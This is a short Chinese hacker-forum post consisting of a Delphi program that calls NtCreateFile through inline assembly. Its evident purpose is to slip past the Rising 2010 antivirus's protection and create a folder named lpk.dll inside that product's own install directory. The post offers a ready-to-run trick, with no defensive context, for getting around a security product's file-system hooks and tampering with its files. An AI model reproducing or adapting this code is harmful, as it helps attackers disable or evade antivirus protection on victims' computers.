在瑞星2010全保护下创建文件夹
program createfolder;
uses
Windows;
const
DIRECTORY_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED or $F;
FILE_CREATE = $00000002;
FILE_DIRECTORY_FILE = $00000001;
OBJ_CASE_INSENSITIVE = $00000040;
type
NTSTATUS = ULONG;
PUnicodeString = ^TUnicodeString;
TUnicodeString = packed record
Length: Word;
MaximumLength: Word;
Buffer: PWideChar;
end;
UNICODE_STRING = TUnicodeString;
PUNICODE_STRING = ^UNICODE_STRING;
PLargeInteger = ^TLargeInteger;
TLargeInteger = packed record
LowPart: Cardinal;
HighPart: Integer;
end;
PObjectAttributes = ^TObjectAttributes;
TObjectAttributes = packed record
Length: Cardinal;
RootDirectory: THandle;
ObjectName: PUNICODE_STRING;
Attributes: Cardinal;
SecurityDescriptor: Pointer;
SecurityQualityOfService: Pointer;
end;
OBJECT_ATTRIBUTES = ^TObjectAttributes;
POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
PIoStatusBlock = ^TIoStatusBlock;
TIoStatusBlock = packed record
Status: NTSTATUS;
Information: Cardinal; //ULONG_PTR
end;
IO_STATUS_BLOCK = TIoStatusBlock;
procedure RtlInitUnicodeString (var Buffer: TUnicodeString;Source: PWideChar); stdcall;external 'ntdll.dll' name 'RtlInitUnicodeString';
function createrixing(Filefname:PWideChar): bool;
var
hmod, hFile: dword;
FileAccess: ulong;
stat: integer;
FileAttr, FileShare, CreateDispos, CreateOptions: ulong;
oba: TObjectAttributes;
iosb: IO_STATUS_BLOCK;
pNtCreateFile, pUniName: pointer;
uniname: UNICODE_STRING;
begin
result := false;
hmod := GetModuleHandle('ntdll.dll');
pNtCreateFile := GetProcAddress(hmod, 'NtCreateFile');
FileAccess := DIRECTORY_ALL_ACCESS;
FileAttr := FILE_ATTRIBUTE_NORMAL;
FileShare := FILE_SHARE_READ or FILE_SHARE_WRITE;
CreateDispos := FILE_CREATE;
CreateOptions := FILE_DIRECTORY_FILE;
RtlInitUnicodeString(uniname, Filefname);
oba.Length := SizeOf(TObjectAttributes);
oba.RootDirectory := 0;
oba.Attributes :=OBJ_CASE_INSENSITIVE;
oba.ObjectName := @UniName;
oba.SecurityDescriptor := nil;
oba.SecurityQualityOfService := nil;
asm
push 0
push 0
push CreateOptions
push CreateDispos
push FileShare
push FileAttr
push 0
lea eax , iosb
push eax
lea eax ,oba
push eax
push FileAccess
lea eax ,hFile
push eax
call pNtCreateFile
mov stat , eax
end;
if (stat <> 0) then result := false else result := true;
end;
begin
if not (createrixing('\??\C:\Program Files\Rising\Rav\lpk.dll')) then messagebox(0, pchar('文件夹创建失败'), '提示', 0) else
messagebox(0, pchar('创建成功'), '提示', 0)
end.
本文章来自黑客帝国论坛